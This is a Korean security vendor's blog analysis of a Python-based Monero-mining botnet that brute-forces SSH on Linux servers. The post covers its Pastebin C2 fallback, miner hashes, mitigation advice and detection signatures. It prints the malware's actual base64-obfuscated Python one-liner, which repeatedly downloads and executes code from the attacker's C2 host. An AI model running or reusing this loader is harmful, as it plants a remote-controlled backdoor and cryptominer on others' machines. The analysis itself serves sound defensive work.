Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
악성코드 정보파이썬 기반 악성 Miner, 리눅스 시스템을 노린다
작성일 2018-01-23 조회 916

 

 

 

 

 

 

 

악성코드 감염 과정에서 파이썬 스크립트가 존재한다는 것은 어떤 것을 의미할까?

 

물론 공격자의 언어의 취향, 그 시대의 트렌드, 가용성 등등 다양한 이유가 존재하겠지만 가장 큰 이유는 리눅스 OS를 감염시키기 위한 도구라고 판단할 수 있습니다.. IT 업종이 아닌 일반 사용자가 윈도우에 파이썬을 설치하는 경우는 그리 많지 않습니다. 하지만 리눅스 OS는 기본적으로 Python이 설치되어 있습니다. 그렇기 때문에 파이썬이 악성코드 유포 과정에 포함되어 있다면 대부분은 리눅스 OS가 목표일 가능성이 크다고 할 수 있습니다.

 

 

최초 SSH 포트가 노출된 리눅스 시스템을 스캔 후 계정 획득을 위한 무차별 공격 수행을 통해 내부로 접근한다고 알려져 있다. 

 

 

 

최초 파이썬으로 아래의 코드를 통해 악성 C2로 접근을 시도한다.

 

python -c "import base64;exec(base64.b64decode('
iNjb2Rpbmc6IHV0Zi04CmltcG9ydCB1cmxsaWIKaW1wb3J0IHVybGxpYjIKaW1wb3J0IG9zCmltcG9ydCBiYXN
lN
jQ
aW1wb3J0IHRpbWUKd2hpbGUgVHJ1ZToKICAgIGQ9ICdodHRwOi8vay56c3c4LmNjOjgwODAnCiAgICB0cnk
6Ci
AgICAgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYjIudXJsb3BlbihkKycvYXBpP3R5cGU9Z2MnKS5
yZWFkKCkpCiAgICAgICAgZXhlYyhwYWdlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZ
XAoNjAw
KQo='))" >/dev/null 2>&1 &

 

 

 

[그림] Base64 디코딩

 

 

 

추가 업로드 된 파이썬 코드는 하드코딩 된 C2가 차단이 될 경우 특정 페이지(Pastebin.com/yDnzKz72)에 접속하여 공격자가 업로드한 C2 주소를 받아와 명령을 수행합니다.

 

[그림] URL 접속 관련 예외처리

 

 

 

현재 해당 게시물은 25만 건 이상의 뷰어를 나타내고 있으며, 일간 약 1,000건 이상의 뷰어가 추가되고 있습니다.

 

[그림] Readme_ssh 뷰어

 

 

 

최근 12월, JBoss 취약점(CVE-2017-12149) 스캔 기능이 추가되어 추후 사용될 것으로 판단됩니다.

 

[그림] Jboss 게시물

 

 

[그림] Decoding Code

 

 

 

Monero Miner

MD5: 9a0629bbb97ef2c2fd8369778aa9a0d3
SHA245: d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
크기: 2,384,177 Byte
행위: Miner

 

 

 

해당 마이너는 기존 많은 악성코드가 사용했던 'XMRig' 서포트 툴이 아닌 'XMRminer' 서포트 툴을 사용합니다.

 

[그림] XMRminer

 

 

 

 

마이닝 풀과 C2 전송하는 형식이 약간 다르지만 XMRig 와 차이가 크지 않습니다.

 

[그림] XMRminer 채굴 통신

 

 

KISA 에서는 해당 악성코드를 방지하기 위해 아래와 같은 방안을 제시하였습니다.

  1) 쉽게 유추할 수 없는 패스워드를 사용해야 하며, 주기적인 변경 필요

  2) 시스템의 주기적인 업데이트가 필요하며, 자원 사용량, 네트워크 트래픽 등의 모니터링 필요

 

 

항상 보안의 관심을 가지어 자신의 정보를 안전하게 지킬 수 있기를 기원합니다.

 

 

 

 

 

 

[Sniper IPS]

 - [4030] Linux/Miner.PycryptoMiner.2384177

 

[Sniper UTM]

 - [838861374] Linux/Miner.PycryptoMiner.2384177

 

[Sniper APTX]

 - [3258] Linux/Miner.PycryptoMiner.2384177

 

 

 

Source

https://www.krcert.or.kr/data/trendView.do?bulletin_writing_sequence=26969

https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar

 

첨부파일 첨부파일이 없습니다.
태그 마이너  채굴  모네로  파이썬